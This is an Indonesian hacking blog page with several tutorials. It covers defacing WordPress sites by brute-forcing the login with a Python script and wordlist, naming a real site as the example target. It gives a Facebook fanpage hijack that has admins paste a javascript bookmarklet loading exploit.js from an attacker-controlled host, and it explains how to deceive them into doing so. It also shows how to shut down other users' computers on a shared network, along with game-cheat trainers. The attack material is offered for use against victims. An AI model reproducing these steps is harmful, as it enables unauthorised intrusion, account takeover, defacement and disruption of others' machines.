Deface Dengan WordPress Brute Force

Brute force adalah tekhnik dimana attacker memaksa masuk ke halaman admin suatu website dengan memanfaatkan random password yang telah mereka kumpulkan.

Pada kesempatakn kali ini admin akan memposting tutorial tutorial dari teman teman IDCA di forum kami ( www.idca.or.id ). Oke langsung saja admin akan share tutorial Brute Force Wordpress dengan script python.

Untuk pengguna LINUX, python sudah terinstal, sedangkan untuk pengguna windows harus menginstalnya terlebih dahulu.

Download Python

Jika sudah terinstal python maka copy script python berikut ini dan save dengan ekstensi .py. Dan juga download Wordlistnya lalu save satu folder dengan file python.

Download Script | Wordlist

Setelah itu, tentukan target. Terserah mau acak atau mau pentest web yang sudah ditentukan.
Ketahui dulu user yang digunakan di website tersebut, agar nanti proses bruteforce tidak sia-sia. Untuk mengetahui daftar user di web target bisa kalian scan dengan Flunym0us. Untuk yang belum tau, baca tentang flunym0us di : Flunym0us, Vulnerability Scanner for Wordpress and Moodle

Oke sekarang kita masuk ke tutorialnya :

1. Buka CMD lalu masuk ke folder dimana kalian menyimpan file python tadi ( cd/folder ) jika suda masuk  ketikan

[namafile].py -h http://[situstarget]/wp-login.php -u [username -P [wordlist].txt

contoh wpbf.py -h http://www.adriannecurry.org/wp-login.php -u adamjohn -P akicha.txt  

2.  Tunggu prosesnya hingga selesai, jika sudah selesai maka akan muncul tulisan seperti berikut

3. Nah jika sudah dapat passwordnya sekarang tinggal login ke website target.

• login wordpress itu terdapat di "localhost/wp-login.php"

4. Jika sudah berhasil masuk sekarang terserah kalian akan kalian apakan website tersebut :)

Sekian tutorial yang dapat kami berikan, tutorial ini admin ambil di thread salah satu Thread yang dibuat oleh member Indonesian Cyber Army ( Nabilaholic404 )

PLEASE SHARE

Tweet

Read More

Cara Hack FP Facebook

Selamat pagi aja,, salam berbagi..

Sekarang saya mau share sedikit tentang trik bagaimana cara hack fanspage. tapi sebelumnya saya tekankan bahwa "Akun facebook / Fanspage itu bisa di hack karna factor Human Error"..

oke langsung saja deh.. :)


Hal-hal yang perlu dipersiapkan:

1. Fanspage Exploit Download  Password: Lihat

2. Hostingan Gratis (idhostinger,nazuka,dll)

3. Script Untuk Menjalankan Exploit

4. Email ID Facebookmu

5. Gunakan Otak (Pintar2) ;)

Langkah-Langkah:

1. Edit exploit.js dengan notepad. cari bagian email ID, lalu ganti dengan email ID mu.. lalu save!

2. Buatlah Hostingan di hosting gratis, Silahkan baca Cara Membuat Hosting Gratis lalu upload exploit.js dan pastikan upload di public_html.. http://sitekamu.hostingan.com/exploit.js

3. Script untuk menjalankan Exploit.js yg sudah diupload di hostingan

javascript:(a = (b = document).createElement(“script”)).src = “http://sitekamu.hostingan.com/exploit.js“, b.body.appendChild(a); void(0)

Sekarang kamu hanya butuh mengirimkan kode Script itu kepada Admin page agar mau menjalankan kode script itu di halaman fanspagenya dengan mengkopy kode script lalu dipastekan di adressbar browser.  katakan saja ini Autolike Fanspage atau terserah gimana caranya membodohinya.. wkwkwk :p

Saran saja,, sebaiknya dicoba2 dulu karena saya tidak jamin exploit itu masih bekerja. mengingat sistem keamanan facebook yang terus diperketat.

sekian, terimakasih

PLEASE SHARE

Tweet

Read More

Cara Melawan Website Anti Ctrl + U [ Mencuri Script ]

Trik Melawan Script Anti CTRL + U | Sebenarnya aku tidak bermaksud untuk nulis artikel ini, ide ini muncul ketika aku jalan - jalan di dokumen yang berjudul "Backup Script Blogger" kemudian ketemu dengan judul script "ANTI CTRL-U" dari sahabat saya Hermanbagus. Langsung deh aku pasang, dan berhasil menampilkan gambar "!!!Deteksi Plagiat!!!", saat itu juga saya berfikir, bagaimana caranya kalau ingin lihat source code di blog lain yang di dalam HTML ada script Anti CTRL - U? Sriptnya kurang lebih seperti ini :

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'> 

saya tidak tau kenapa bang herman bisa pakai gambar seperti itu, tapi itulah kreatifitas. Mantap!
Analisa saya :

Anti CTRL + U | itu berarti ada kaitannya dengan Keyboard yaitu di tombol Ctrl dan U, jadi saya bisa langsung ambil kesimpulan bahwa Anti CTRL+U tidak ada kaitannya dengan mouse atau meng-klik tombol di Web Brower atau tidak ada kaitannya jika aku ketikan sesuatu yang tidak ada unsur CTRL + U secara langsung. 

Sebagai kelinci percobaan adalah blog saya. Sudah lama, aku pakai add on SEO QUAKE, di benak saya langsung terfikir shortcut yang ada di Seo Quake yaitu Page Source. Saya klik dan hasilnya saya bisa melihat source code, sebelum saya pasang script anti CTRL+U. Kemudian saya pasang Script Anti CTRL+U, dan sekali lagi saya masih bisa melihat Source Code blog ini. Berhasil!!
Itu tadi adalah cara mengintip source code blog dari Add On Seo Quake. Klik disini untuk pemasangan Seo Quake. Buktikan sendiri dengan blog ini sebagai kelinci percobaan.

Kedua, ini adalah langkah lebih cepat dan paling mudah mengintip source code yang di anti ctrl-u.
Perhatikan baik - baik :

view-source:http://URL

Ketikan itu di address browser, ganti URL dengan blog yang akan anda intip.

PLEASE SHARE

Tweet

Read More

Pearl's Peril Hack Instant Hint Cooldown and No Wrong Click Penalty Update

Pearl's Peril Hack Instant Hint Cooldown and No Wrong Click Penalty Update, this cheats works to make it easy to find objects hidden, so you will be very easy to finish your mission. Features: Instant Hint Cooldown and No Wrong Click Penalty.
Info Update:
Pearl's Peril Hack Instant Hint Cooldown and No Wrong Click Penalty Update ‎‎‎‎Sunday, ‎February ‎16, ‎2014. Update to Pearls Peril V.13
Play Pearl's Peril : https://apps.facebook.com/pearls-peril/

Tools Required:

• Cheat Engine
  
  Free Download CheatEngine


• Pearls Peril V.13 (free download, no password and no survey)
  
  Free Download Pearls Peril V.13


• Your browser (firefox, google chrome and IE)

Steps:

1. Download and Instal Cheat Engine
2. Download Pearl's Peril CT File
3. Log in to your facebook account and Play Pearl's Peril (don't click anything)
4. Open Cheat Engine then select process browser, example : Firefox on Win 7 select FlashPlayerPlugin, firefox on Win Xp select plugin-container.exe, google chrome select chrome.exe  and other
5. Load or open Pearl's Peril CT File
6. Then enable or tick all hack
7. After that, play Pearl's Peril

PLEASE SHARE

Tweet

Read More

The King Of Tower Super Hack Update

The King Of Tower Super Hack Update. This cheat is useful to make your tower, heroes and army invincible so you will be very easy to defeat your enemies. You can download this trainer for free, no password and no survey.
Info Update:
The King Of Tower Super Hack Update ‎‎‎Sunday, ‎February ‎16, ‎2014. Update steps to use TheKingOfTower Trainer.

Play Game: The King Of Tower on facebook: https://apps.faceboo...&ref=ts&fref=ts
Feature: Super Tower, Super Soldier and Super Hero
NOTE: If this cheat does not work please comment, I will try to update it.

Tools Required:

1. Cheat Engine :
   
   Free Download Cheat Engine


2. TheKingOfTower Trainer V8  (Free Download, no password and no survey)
   
   Free Download TheKingOfTower V8 32-bit :
   
   Free Download TheKingOfTower V8 64-bit


3. Your Browser

Steps to use this trainer:

1. Download and Instal Cheat Engine
2. Download The King Of Tower Trainer
3. Log in to your facebook account and Play The King Of Tower
4. After you are in homepage game, go into battle map (click gate battle)
5. Open Trainer, select your browser then click enable hack or all hack in the battle map
6. After that, let's defeat your enemy.

PLEASE SHARE

Tweet

Read More

Cara Mematikan Komputer Orang Dari Jarak Jauh

Hhmmmm... terkadang kita merasa jengkel  ketika kita bermain internet tetapi kecepatan internet sangat lambat, itu disebabkan karena banyaknya pengguna jaringan. Timbul pikiran saya bagaimana menambah kecepatan internet saya tanpa sepengetahuan orang lain.

Nah, saya akan menambah kecepatan internet saya dengan cara mematikan komputer orang lain dari jarak jauh, tentunya orang yang akan kita mantikan komputernya berada dalam satu jaringan wireless dengan kita dan orang tersebut tidak akan mengetahui siapa yang mematikan komputernya,..(hehhee kejam ya... ini cuma untuk pembelajaran aja).

Okay, mari kita lihat langkah-langkahnya.

Langkah 1 : Pastikan komputer anda terhubung dengan jaringan.

Langkah 2 : Buka Command Prompt atau bisa juga dengan klik run, ketikkan CMD. Maka akan terlihat seperti gambar berikut.

Langkah 3 : Ketik Shutdown -i di  Command Prompt dan akan terlihat kotak dailog seperti gambar di bawah ini.

 

Langkah 4 : Klik Add untuk menambah orang yang ingin kita matikan komputernya. Caranya masukan nama atau IP Adress orang.

Langkah 5 : Ada tiga pilihan Restart, Shutdown dan Annotate Unexpected Shutdown. Terserah anda ingin pilih yang mana.

Langkah 6 : Tentukan waktu untuk menghidupkan kembali kompter orang. Pada Option pilih Other (Planned).

Langkah 7 : Ketik komentar anda pada tabel Comment. Tulisan yang anda ketik akan dibaca oleh orang yang ingin kita matikan komputernya. Contoh : 30 detik lagi komputer anda akan rusak.

Langkah 8 : Klik Ok. dan selesai.....

Pasti anda bertanya-tanya bagaimana mendapatkan atau mencari orang yang satu jaringan dengan kita, Nah, saya katakan itu sangat mudah. Anda hanya menggunakan sebuah software yaitu NetResView. Silahkan download NetResView.

 Downlaod Via Ziddu

Download

RAR Password : didid.irmawan

Setelah anda mendapatkan nama orang atau IP Adress orang, ikuti langkang yang ke 4.
Sedikit trik dari saya semoga bermanfaat.

PLEASE SHARE

Tweet

Read More